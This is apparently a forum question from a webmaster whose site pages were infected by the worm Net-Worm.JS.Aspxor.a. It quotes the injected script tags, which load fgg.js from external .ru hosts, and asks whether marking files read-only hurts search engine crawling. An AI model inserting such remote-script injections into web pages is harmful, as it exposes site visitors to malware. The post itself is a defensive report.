I face a strange problem. All of sudden in our company website, the below script gets included automatically the end of the body tag. i.e, above </body> tag.
<script src=http://www.4cnw.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script>....and on...

Later it was found that it was due to a worm by name Net-Worm.JS.Aspxor.a

So I reuploaded the script free html files after making it write protected. (right click on files > properties > Checking the Read Only attribute ).

Does this prevent the search engine spiders crawling into the webpage ? Does this affect the search engine ranking ?
